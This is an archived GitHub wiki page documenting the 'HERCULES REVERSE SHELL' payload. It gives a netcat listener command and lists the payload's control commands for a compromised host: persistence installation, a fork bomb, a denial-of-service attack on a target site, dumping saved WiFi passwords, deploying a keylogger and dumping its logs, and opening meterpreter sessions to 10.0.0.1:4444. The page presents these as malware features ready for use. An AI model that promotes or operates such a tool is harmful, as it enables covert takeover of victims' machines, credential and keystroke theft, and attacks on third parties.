Skip to content
This repository has been archived by the owner on Feb 14, 2023. It is now read-only.

What is HERCULES REVERSE SHELL ?

Ege Balcı edited this page Jul 25, 2016 · 1 revision

HERCULES REVERSE SHELL is a customized reverse shell payload, it has few special commands for more advanced control over remote host.

#HOW TO USE

After creating the payload use this netcat command for handling the connections

nc -l -p "Local Port Here"

    [ COMMAND ]                                       [DESCRIPTION]                                 
                        
                                                                                                 
    ~PERSSISTENCE                         Installs a persistence module for continious acces

    ~DISTRACT                             Executes a fork bomb bat file for distraction

    ~PLEASE                               Asks users comfirmation for higher privilidge operations

    ~DOS -A "www.targetsite.com"          Starts a denial of service atack

    ~WIFI-LIST                            Dumps all wifi history data with passwords

    ~METERPRETER --http "10.0.0.1:4444"   Creates a meterpreter connection to metasploit (http/https/tcp)

    ~KEYLOGGER-DEPLOY                     Installs a keylogger module and logs all keystrokes

    ~KEYLOGGER-DUMP                       Dumps all loged keystrokes

    ~MIGRATE "10.0.0.1:4444" 2222         Creates a reverse http meterpreter session at given pid (EXPERIMENTAL)  
Clone this wiki locally